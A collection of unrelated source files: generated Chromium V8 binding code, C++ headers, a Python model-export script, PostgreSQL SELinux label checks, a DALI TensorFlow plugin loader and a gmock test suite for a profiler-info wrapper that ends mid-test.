// third_party/blink/renderer/bindings/templates/interface.cc.tmpl
// by the script code_generator_v8.py.
// DO NOT MODIFY!
// clang-format off
#include "third_party/blink/renderer/bindings/tests/results/core/v8_test_interface_constructor_4.h"
#include <algorithm>
#include "base/memory/scoped_refptr.h"
#include "third_party/blink/renderer/bindings/core/v8/idl_types.h"
#include "third_party/blink/renderer/bindings/core/v8/native_value_traits_impl.h"
#include "third_party/blink/renderer/bindings/core/v8/v8_dom_configuration.h"
#include "third_party/blink/renderer/bindings/core/v8/v8_test_interface_constructor_4.h"
#include "third_party/blink/renderer/core/execution_context/execution_context.h"
#include "third_party/blink/renderer/core/frame/local_dom_window.h"
#include "third_party/blink/renderer/core/frame/web_feature.h"
#include "third_party/blink/renderer/platform/bindings/exception_messages.h"
#include "third_party/blink/renderer/platform/bindings/exception_state.h"
#include "third_party/blink/renderer/platform/bindings/v8_object_constructor.h"
#include "third_party/blink/renderer/platform/instrumentation/use_counter.h"
#include "third_party/blink/renderer/platform/scheduler/public/cooperative_scheduling_manager.h"
#include "third_party/blink/renderer/platform/wtf/get_ptr.h"
namespace blink {
// Suppress warning: global constructors, because struct WrapperTypeInfo is trivial
// and does not depend on another global objects.
#if defined(COMPONENT_BUILD) && defined(WIN32) && defined(__clang__)
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wglobal-constructors"
#endif
const WrapperTypeInfo v8_test_interface_constructor_4_wrapper_type_info = {
gin::kEmbedderBlink,
V8TestInterfaceConstructor4::DomTemplate,
nullptr,
"TestInterfaceConstructor4",
nullptr,
WrapperTypeInfo::kWrapperTypeObjectPrototype,
WrapperTypeInfo::kObjectClassId,
WrapperTypeInfo::kNotInheritFromActiveScriptWrappable,
};
#if defined(COMPONENT_BUILD) && defined(WIN32) && defined(__clang__)
#pragma clang diagnostic pop
#endif
// This static member must be declared by DEFINE_WRAPPERTYPEINFO in TestInterfaceConstructor4.h.
// For details, see the comment of DEFINE_WRAPPERTYPEINFO in
// platform/bindings/ScriptWrappable.h.
const WrapperTypeInfo& TestInterfaceConstructor4::wrapper_type_info_ = v8_test_interface_constructor_4_wrapper_type_info;
// not [ActiveScriptWrappable]
static_assert(
!std::is_base_of<ActiveScriptWrappableBase, TestInterfaceConstructor4>::value,
"TestInterfaceConstructor4 inherits from ActiveScriptWrappable<>, but is not specifying "
"[ActiveScriptWrappable] extended attribute in the IDL file. "
"Be consistent.");
static_assert(
std::is_same<decltype(&TestInterfaceConstructor4::HasPendingActivity),
decltype(&ScriptWrappable::HasPendingActivity)>::value,
"TestInterfaceConstructor4 is overriding hasPendingActivity(), but is not specifying "
"[ActiveScriptWrappable] extended attribute in the IDL file. "
"Be consistent.");
namespace test_interface_constructor_4_v8_internal {
static void Constructor1(const v8::FunctionCallbackInfo<v8::Value>& info) {
RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT(info.GetIsolate(), "Blink_TestInterfaceConstructor4_ConstructorCallback");
ExceptionState exception_state(info.GetIsolate(), ExceptionState::kConstructionContext, "TestInterfaceConstructor4");
ScriptState* script_state = ScriptState::From(
info.NewTarget().As<v8::Object>()->CreationContext());
TestInterfaceConstructor4* test_interface_4_arg;
test_interface_4_arg = V8TestInterfaceConstructor4::ToImplWithTypeCheck(info.GetIsolate(), info[0]);
if (!test_interface_4_arg) {
exception_state.ThrowTypeError(ExceptionMessages::ArgumentNotOfType(0, "TestInterfaceConstructor4"));
return;
}
TestInterfaceConstructor4* impl = TestInterfaceConstructor4::Create(script_state, test_interface_4_arg, exception_state);
if (exception_state.HadException()) {
return;
}
v8::Local<v8::Object> wrapper = info.Holder();
wrapper = impl->AssociateWithWrapper(info.GetIsolate(), V8TestInterfaceConstructor4::GetWrapperTypeInfo(), wrapper);
V8SetReturnValue(info, wrapper);
}
static void Constructor2(const v8::FunctionCallbackInfo<v8::Value>& info) {
RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT(info.GetIsolate(), "Blink_TestInterfaceConstructor4_ConstructorCallback");
ExceptionState exception_state(info.GetIsolate(), ExceptionState::kConstructionContext, "TestInterfaceConstructor4");
ScriptState* script_state = ScriptState::From(
info.NewTarget().As<v8::Object>()->CreationContext());
V8StringResource<> usv_string_arg;
usv_string_arg = NativeValueTraits<IDLUSVString>::NativeValue(info.GetIsolate(), info[0], exception_state);
if (exception_state.HadException())
return;
TestInterfaceConstructor4* impl = TestInterfaceConstructor4::Create(script_state, usv_string_arg, exception_state);
if (exception_state.HadException()) {
return;
}
v8::Local<v8::Object> wrapper = info.Holder();
wrapper = impl->AssociateWithWrapper(info.GetIsolate(), V8TestInterfaceConstructor4::GetWrapperTypeInfo(), wrapper);
V8SetReturnValue(info, wrapper);
}
static void Constructor(const v8::FunctionCallbackInfo<v8::Value>& info) {
ExceptionState exception_state(info.GetIsolate(), ExceptionState::kConstructionContext, "TestInterfaceConstructor4");
switch (std::min(1, info.Length())) {
case 1:
if (V8TestInterfaceConstructor4::HasInstance(info[0], info.GetIsolate())) {
test_interface_constructor_4_v8_internal::Constructor1(info);
return;
}
if (true) {
test_interface_constructor_4_v8_internal::Constructor2(info);
return;
}
break;
default:
exception_state.ThrowTypeError(ExceptionMessages::NotEnoughArguments(1, info.Length()));
return;
}
exception_state.ThrowTypeError("No matching constructor signature.");
}
CORE_EXPORT void ConstructorCallback(const v8::FunctionCallbackInfo<v8::Value>& info) {
RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT(info.GetIsolate(), "Blink_TestInterfaceConstructor4_Constructor");
ExecutionContext* execution_context_for_measurement = CurrentExecutionContext(info.GetIsolate());
UseCounter::Count(execution_context_for_measurement, WebFeature::kV8TestInterfaceConstructor4_Constructor);
if (!info.IsConstructCall()) {
V8ThrowException::ThrowTypeError(
info.GetIsolate(),
ExceptionMessages::ConstructorNotCallableAsFunction("TestInterfaceConstructor4"));
return;
}
if (ConstructorMode::Current(info.GetIsolate()) == ConstructorMode::kWrapExistingObject) {
V8SetReturnValue(info, info.Holder());
return;
}
V8TestInterfaceConstructor4::ConstructorCustom(info);
}
} // namespace test_interface_constructor_4_v8_internal
static void InstallV8TestInterfaceConstructor4Template(
v8::Isolate* isolate,
const DOMWrapperWorld& world,
v8::Local<v8::FunctionTemplate> interface_template) {
// Initialize the interface object's template.
V8DOMConfiguration::InitializeDOMInterfaceTemplate(isolate, interface_template, V8TestInterfaceConstructor4::GetWrapperTypeInfo()->interface_name, v8::Local<v8::FunctionTemplate>(), V8TestInterfaceConstructor4::kInternalFieldCount);
interface_template->SetCallHandler(test_interface_constructor_4_v8_internal::ConstructorCallback);
interface_template->SetLength(1);
v8::Local<v8::Signature> signature = v8::Signature::New(isolate, interface_template);
ALLOW_UNUSED_LOCAL(signature);
v8::Local<v8::ObjectTemplate> instance_template = interface_template->InstanceTemplate();
ALLOW_UNUSED_LOCAL(instance_template);
v8::Local<v8::ObjectTemplate> prototype_template = interface_template->PrototypeTemplate();
ALLOW_UNUSED_LOCAL(prototype_template);
// Register IDL constants, attributes and operations.
// Custom signature
V8TestInterfaceConstructor4::InstallRuntimeEnabledFeaturesOnTemplate(
isolate, world, interface_template);
}
void V8TestInterfaceConstructor4::InstallRuntimeEnabledFeaturesOnTemplate(
v8::Isolate* isolate,
const DOMWrapperWorld& world,
v8::Local<v8::FunctionTemplate> interface_template) {
v8::Local<v8::Signature> signature = v8::Signature::New(isolate, interface_template);
ALLOW_UNUSED_LOCAL(signature);
v8::Local<v8::ObjectTemplate> instance_template = interface_template->InstanceTemplate();
ALLOW_UNUSED_LOCAL(instance_template);
v8::Local<v8::ObjectTemplate> prototype_template = interface_template->PrototypeTemplate();
ALLOW_UNUSED_LOCAL(prototype_template);
// Register IDL constants, attributes and operations.
// Custom signature
}
v8::Local<v8::FunctionTemplate> V8TestInterfaceConstructor4::DomTemplate(
v8::Isolate* isolate, const DOMWrapperWorld& world) {
return V8DOMConfiguration::DomClassTemplate(
isolate, world, const_cast<WrapperTypeInfo*>(V8TestInterfaceConstructor4::GetWrapperTypeInfo()),
InstallV8TestInterfaceConstructor4Template);
}
bool V8TestInterfaceConstructor4::HasInstance(v8::Local<v8::Value> v8_value, v8::Isolate* isolate) {
return V8PerIsolateData::From(isolate)->HasInstance(V8TestInterfaceConstructor4::GetWrapperTypeInfo(), v8_value);
}
v8::Local<v8::Object> V8TestInterfaceConstructor4::FindInstanceInPrototypeChain(
v8::Local<v8::Value> v8_value, v8::Isolate* isolate) {
return V8PerIsolateData::From(isolate)->FindInstanceInPrototypeChain(
V8TestInterfaceConstructor4::GetWrapperTypeInfo(), v8_value);
}
TestInterfaceConstructor4* V8TestInterfaceConstructor4::ToImplWithTypeCheck(
v8::Isolate* isolate, v8::Local<v8::Value> value) {
return HasInstance(value, isolate) ? ToImpl(v8::Local<v8::Object>::Cast(value)) : nullptr;
}
} // namespace blink
| 3,380 |
5,535 |
<gh_stars>1000+
//---------------------------------------------------------------------------
// Greenplum Database
// Copyright (C) 2012 EMC Corp.
//
// @filename:
// CCorrelatedExecutionTest.h
//
// @doc:
// Test for correlated subqueries
//---------------------------------------------------------------------------
#ifndef GPOPT_CCorrelatedExecutionTest_H
#define GPOPT_CCorrelatedExecutionTest_H
#include "gpos/base.h"
#include "gpos/common/CDynamicPtrArray.h"
#include "gpos/common/CRefCount.h"
#include "gpos/string/CWStringDynamic.h"
#include "gpopt/base/CColRef.h"
#include "gpopt/base/CDrvdProp.h"
#include "gpopt/base/CPrintPrefix.h"
#include "gpopt/operators/CExpression.h"
#include "gpopt/operators/COperator.h"
// forward declarations
namespace gpdxl
{
using IntPtrArray = CDynamicPtrArray<INT, CleanupDelete>;
}
namespace gpopt
{
//---------------------------------------------------------------------------
// @class:
// CCorrelatedExecutionTest
//
// @doc:
// Tests for converting Apply expressions into NL expressions
//
//---------------------------------------------------------------------------
class CCorrelatedExecutionTest
{
private:
// counter used to mark last successful test
static ULONG m_ulTestCounter;
public:
// unittests
static GPOS_RESULT EresUnittest();
static GPOS_RESULT EresUnittest_RunAllPositiveTests();
}; // class CCorrelatedExecutionTest
} // namespace gpopt
#endif // !GPOPT_CCorrelatedExecutionTest_H
// EOF
| 453 |
775 |
<reponame>ntyukaev/training_extensions<gh_stars>100-1000
"""
Model exporting tool.
"""
# Copyright (C) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions
# and limitations under the License.
import argparse
import os
from ote_sdk.configuration.helper import create
from ote_sdk.entities.model import ModelEntity, ModelOptimizationType
from ote_sdk.entities.task_environment import TaskEnvironment
from ote_sdk.usecases.adapters.model_adapter import ModelAdapter
from ote_sdk.usecases.tasks.interfaces.export_interface import ExportType
from ote_cli.registry import find_and_parse_model_template
from ote_cli.utils.importing import get_impl_class
from ote_cli.utils.io import read_binary, read_label_schema, save_model_data
from ote_cli.utils.nncf import is_checkpoint_nncf
def parse_args():
"""
Parses command line arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument("template")
parser.add_argument(
"--load-weights",
required=True,
help="Load only weights from previously saved checkpoint",
)
parser.add_argument(
"--save-model-to",
required="True",
help="Location where exported model will be stored.",
)
return parser.parse_args()
def main():
"""
Main function that is used for model exporting.
"""
args = parse_args()
# Load template.yaml file.
template = find_and_parse_model_template(args.template)
# Get class for Task.
is_nncf = is_checkpoint_nncf(args.load_weights)
task_class = get_impl_class(
template.entrypoints.nncf if is_nncf else template.entrypoints.base
)
# Get hyper parameters schema.
hyper_parameters = create(template.hyper_parameters.data)
assert hyper_parameters
environment = TaskEnvironment(
model=None,
hyper_parameters=hyper_parameters,
label_schema=read_label_schema(args.load_weights),
model_template=template,
)
model_adapters = {"weights.pth": ModelAdapter(read_binary(args.load_weights))}
model = ModelEntity(
configuration=environment.get_model_configuration(),
model_adapters=model_adapters,
train_dataset=None,
optimization_type=ModelOptimizationType.NNCF
if is_nncf
else ModelOptimizationType.NONE,
)
environment.model = model
task = task_class(task_environment=environment)
exported_model = ModelEntity(None, environment.get_model_configuration())
task.export(ExportType.OPENVINO, exported_model)
os.makedirs(args.save_model_to, exist_ok=True)
save_model_data(exported_model, args.save_model_to)
if __name__ == "__main__":
main()
| 1,110 |
360 |
<filename>contrib/sepgsql/proc.cpp
/* -------------------------------------------------------------------------
*
* contrib/sepgsql/proc.c
*
* Routines corresponding to procedure objects
*
* Copyright (c) 2010-2012, PostgreSQL Global Development Group
*
* -------------------------------------------------------------------------
*/
#include "postgres.h"
#include "knl/knl_variable.h"
#include "access/genam.h"
#include "access/heapam.h"
#include "access/sysattr.h"
#include "catalog/dependency.h"
#include "catalog/indexing.h"
#include "catalog/pg_namespace.h"
#include "catalog/pg_proc.h"
#include "commands/seclabel.h"
#include "utils/builtins.h"
#include "utils/fmgroids.h"
#include "utils/lsyscache.h"
#include "utils/tqual.h"
#include "sepgsql.h"
/*
* sepgsql_proc_post_create
*
* This routine assigns a default security label on a newly defined
* procedure.
*/
void sepgsql_proc_post_create(Oid functionId)
{
Relation rel;
ScanKeyData skey;
SysScanDesc sscan;
HeapTuple tuple;
char* scontext = NULL;
char* tcontext = NULL;
char* ncontext = NULL;
int i;
StringInfoData audit_name;
ObjectAddress object;
Form_pg_proc proForm;
/*
* Fetch namespace of the new procedure. Because pg_proc entry is not
* visible right now, we need to scan the catalog using SnapshotSelf.
*/
rel = heap_open(ProcedureRelationId, AccessShareLock);
ScanKeyInit(&skey, ObjectIdAttributeNumber, BTEqualStrategyNumber, F_OIDEQ, ObjectIdGetDatum(functionId));
sscan = systable_beginscan(rel, ProcedureOidIndexId, true, SnapshotSelf, 1, &skey);
tuple = systable_getnext(sscan);
if (!HeapTupleIsValid(tuple))
elog(ERROR, "catalog lookup failed for proc %u", functionId);
proForm = (Form_pg_proc)GETSTRUCT(tuple);
/*
* check db_schema:{add_name} permission of the namespace
*/
object.classId = NamespaceRelationId;
object.objectId = proForm->pronamespace;
object.objectSubId = 0;
sepgsql_avc_check_perms(
&object, SEPG_CLASS_DB_SCHEMA, SEPG_DB_SCHEMA__ADD_NAME, getObjectDescription(&object), true);
/*
* XXX - db_language:{implement} also should be checked here
*/
/*
* Compute a default security label when we create a new procedure object
* under the specified namespace.
*/
scontext = sepgsql_get_client_label();
tcontext = sepgsql_get_label(NamespaceRelationId, proForm->pronamespace, 0);
ncontext = sepgsql_compute_create(scontext, tcontext, SEPG_CLASS_DB_PROCEDURE);
/*
* check db_procedure:{create} permission
*/
initStringInfo(&audit_name);
appendStringInfo(&audit_name, "function %s(", NameStr(proForm->proname));
for (i = 0; i < proForm->pronargs; i++) {
Oid typeoid = proForm->proargtypes.values[i];
if (i > 0)
appendStringInfoChar(&audit_name, ',');
appendStringInfoString(&audit_name, format_type_be(typeoid));
}
appendStringInfoChar(&audit_name, ')');
sepgsql_avc_check_perms_label(ncontext, SEPG_CLASS_DB_PROCEDURE, SEPG_DB_PROCEDURE__CREATE, audit_name.data, true);
/*
* Assign the default security label on a new procedure
*/
object.classId = ProcedureRelationId;
object.objectId = functionId;
object.objectSubId = 0;
SetSecurityLabel(&object, SEPGSQL_LABEL_TAG, ncontext);
/*
* Cleanup
*/
systable_endscan(sscan);
heap_close(rel, AccessShareLock);
pfree(audit_name.data);
pfree(tcontext);
pfree(ncontext);
}
/*
* sepgsql_proc_drop
*
* It checks privileges to drop the supplied function.
*/
void sepgsql_proc_drop(Oid functionId)
{
ObjectAddress object;
char* audit_name = NULL;
/*
* check db_schema:{remove_name} permission
*/
object.classId = NamespaceRelationId;
object.objectId = get_func_namespace(functionId);
object.objectSubId = 0;
audit_name = getObjectDescription(&object);
sepgsql_avc_check_perms(&object, SEPG_CLASS_DB_SCHEMA, SEPG_DB_SCHEMA__REMOVE_NAME, audit_name, true);
pfree(audit_name);
/*
* check db_procedure:{drop} permission
*/
object.classId = ProcedureRelationId;
object.objectId = functionId;
object.objectSubId = 0;
audit_name = getObjectDescription(&object);
sepgsql_avc_check_perms(&object, SEPG_CLASS_DB_PROCEDURE, SEPG_DB_PROCEDURE__DROP, audit_name, true);
pfree(audit_name);
}
/*
* sepgsql_proc_relabel
*
* It checks privileges to relabel the supplied function
* by the `seclabel'.
*/
void sepgsql_proc_relabel(Oid functionId, const char* seclabel)
{
ObjectAddress object;
char* audit_name = NULL;
object.classId = ProcedureRelationId;
object.objectId = functionId;
object.objectSubId = 0;
audit_name = getObjectDescription(&object);
/*
* check db_procedure:{setattr relabelfrom} permission
*/
sepgsql_avc_check_perms(&object,
SEPG_CLASS_DB_PROCEDURE,
SEPG_DB_PROCEDURE__SETATTR | SEPG_DB_PROCEDURE__RELABELFROM,
audit_name,
true);
/*
* check db_procedure:{relabelto} permission
*/
sepgsql_avc_check_perms_label(seclabel, SEPG_CLASS_DB_PROCEDURE, SEPG_DB_PROCEDURE__RELABELTO, audit_name, true);
pfree(audit_name);
}
| 2,063 |
3,967 |
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import os
import glob
import re
_dali_tf_module = None
def load_dali_tf_plugin():
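    """Load the DALI TensorFlow plugin, preferring the prebuilt library matching the installed TF version, and cache the loaded module."""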
global _dali_tf_module
if _dali_tf_module is not None:
return _dali_tf_module
import nvidia.dali # Make sure DALI lib is loaded
tf_plugins = glob.glob(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'libdali_tf*.so'))
# Order: 'current', prebuilt for current TF version, prebuilt for other TF versions
    tf_version = re.search(r"(\d+\.\d+)\.\d+", tf.__version__).group(1)
tf_version_underscore = tf_version.replace('.', '_')
dali_tf_current = list(filter(lambda x: 'current' in x, tf_plugins))
dali_tf_prebuilt_tf_ver = list(filter(lambda x: tf_version_underscore in x, tf_plugins))
dali_tf_prebuilt_others = list(filter(lambda x: 'current' not in x and tf_version_underscore not in x, tf_plugins))
processed_tf_plugins = dali_tf_current + dali_tf_prebuilt_tf_ver + dali_tf_prebuilt_others
first_error = None
for libdali_tf in processed_tf_plugins:
try:
_dali_tf_module = tf.load_op_library(libdali_tf)
break
# if plugin is not compatible skip it
except tf.errors.NotFoundError as error:
if first_error is None:
first_error = error
else:
raise first_error or Exception('No matching DALI plugin found for installed TensorFlow version')
return _dali_tf_module
| 739 |
852 |
import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Run2_25ns_cff import Run2_25ns
from Configuration.Eras.Modifier_tracker_apv_vfp30_2016_cff import tracker_apv_vfp30_2016
Run2_25ns_HIPM = cms.ModifierChain(Run2_25ns, tracker_apv_vfp30_2016)
| 108 |
657 |
<reponame>sndp487/rescuekerala
# Generated by Django 2.2.11 on 2020-06-21 11:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("mainapp", "0112_auto_20200531_2242"),
]
operations = [
migrations.AlterField(model_name="hashtag", name="name", field=models.CharField(max_length=20, unique=True),),
]
| 152 |
575 |
<gh_stars>100-1000
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROME_BROWSER_CHROMEOS_POWER_AUTO_SCREEN_BRIGHTNESS_BRIGHTNESS_MONITOR_H_
#define CHROME_BROWSER_CHROMEOS_POWER_AUTO_SCREEN_BRIGHTNESS_BRIGHTNESS_MONITOR_H_
#include "base/observer_list_types.h"
namespace chromeos {
namespace power {
namespace auto_screen_brightness {
// Interface for monitoring the screen brightness.
class BrightnessMonitor {
public:
// These values are persisted to logs. Entries should not be renumbered and
// numeric values should never be reused.
enum class Status {
kInitializing = 0,
kSuccess = 1,
kDisabled = 2,
kMaxValue = kDisabled
};
class Observer : public base::CheckedObserver {
public:
Observer() = default;
~Observer() override = default;
// Called when BrightnessMonitor is initialized.
virtual void OnBrightnessMonitorInitialized(bool success) = 0;
// Called soon after the screen brightness is changed in response to a user
// request. Rapid changes are not reported; only the final change in a
// sequence will be sent. The |old_brightness_percent| is the brightness
// value just before user requested the change, and |new_brightness_percent|
// is the final/consolidated brightness value after the change.
virtual void OnUserBrightnessChanged(double old_brightness_percent,
double new_brightness_percent) = 0;
// Called for every user request, i.e. it's not consolidated like
// |OnUserBrightnessChanged|.
virtual void OnUserBrightnessChangeRequested() = 0;
private:
DISALLOW_COPY_AND_ASSIGN(Observer);
};
virtual ~BrightnessMonitor() = default;
// Adds or removes an observer.
virtual void AddObserver(Observer* observer) = 0;
virtual void RemoveObserver(Observer* observer) = 0;
};
} // namespace auto_screen_brightness
} // namespace power
} // namespace chromeos
#endif // CHROME_BROWSER_CHROMEOS_POWER_AUTO_SCREEN_BRIGHTNESS_BRIGHTNESS_MONITOR_H_
| 702 |
1,090 |
#include "stdafx.h"
#include "TestProfilerInfo.h"
#include "MockProfilerInfo.h"
#include "ComBaseTest.h"
using ::testing::_;
using ::testing::Return;
using ::testing::Invoke;
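// Fixture that chains a CTestProfilerInfo to a mock profiler info so that forwarded calls can be verified.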
class ProfilerInfoBaseTest : public ComBaseTest {
public:
ProfilerInfoBaseTest() : mockProfilerInfo_(nullptr),
testProfilerInfo_(nullptr)
{
}
private:
void SetUp() override
{
CreateComObject(&testProfilerInfo_);
CreateComObject(&mockProfilerInfo_);
testProfilerInfo_->ChainProfilerInfo(mockProfilerInfo_);
}
void TearDown() override
{
ASSERT_EQ(0, testProfilerInfo_->Release());
ASSERT_EQ(0, mockProfilerInfo_->Release());
}
protected:
CComObject<MockProfilerInfo> *mockProfilerInfo_;
CComObject<CTestProfilerInfo> *testProfilerInfo_;
};
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_HasHookedAllAvailableInterfaces)
{
ASSERT_EQ(8, mockProfilerInfo_->Release());
ASSERT_EQ(9, mockProfilerInfo_->AddRef());
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassFromObject_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassFromObject(_, _))
.WillByDefault(Invoke([this](/* [in] */ ObjectID objectId,
/* [out] */ ClassID *pClassId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassFromObject(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassFromObject(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassFromToken_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassFromToken(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ mdTypeDef typeDef,
/* [out] */ ClassID *pClassId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassFromToken(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassFromToken(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetCodeInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetCodeInfo(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [out] */ LPCBYTE *pStart,
/* [out] */ ULONG *pcSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetCodeInfo(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetCodeInfo(0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetEventMask_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetEventMask(_))
.WillByDefault(Invoke([this](/* [out] */ DWORD *pdwEvents) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetEventMask(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetEventMask(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionFromIP_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionFromIP(_, _))
.WillByDefault(Invoke([this](/* [in] */ LPCBYTE ip,
/* [out] */ FunctionID *pFunctionId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionFromIP(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionFromIP(nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionFromToken_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionFromToken(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ mdToken token,
/* [out] */ FunctionID *pFunctionId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionFromToken(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionFromToken(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetHandleFromThread_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetHandleFromThread(_, _))
.WillByDefault(Invoke([this](/* [in] */ ThreadID threadId,
/* [out] */ HANDLE *phThread) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetHandleFromThread(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetHandleFromThread(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetObjectSize_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetObjectSize(_, _))
.WillByDefault(Invoke([this](/* [in] */ ObjectID objectId,
/* [out] */ ULONG *pcSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetObjectSize(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetObjectSize(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_IsArrayClass_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, IsArrayClass(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [out] */ CorElementType *pBaseElemType,
/* [out] */ ClassID *pBaseClassId,
/* [out] */ ULONG *pcRank) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, IsArrayClass(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->IsArrayClass(0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetThreadInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetThreadInfo(_, _))
.WillByDefault(Invoke([this](/* [in] */ ThreadID threadId,
/* [out] */ DWORD *pdwWin32ThreadId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetThreadInfo(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetThreadInfo(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetCurrentThreadID_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetCurrentThreadID(_))
.WillByDefault(Invoke([this](/* [out] */ ThreadID *pThreadId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetCurrentThreadID(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetCurrentThreadID(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassIDInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassIDInfo(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [out] */ ModuleID *pModuleId,
/* [out] */ mdTypeDef *pTypeDefToken) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassIDInfo(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassIDInfo(0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionInfo(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [out] */ ClassID *pClassId,
/* [out] */ ModuleID *pModuleId,
/* [out] */ mdToken *pToken) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionInfo(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionInfo(0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEventMask_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEventMask(_))
.WillByDefault(Invoke([this](/* [in] */ DWORD dwEvents) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEventMask(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEventMask(0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEnterLeaveFunctionHooks_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks(_, _, _))
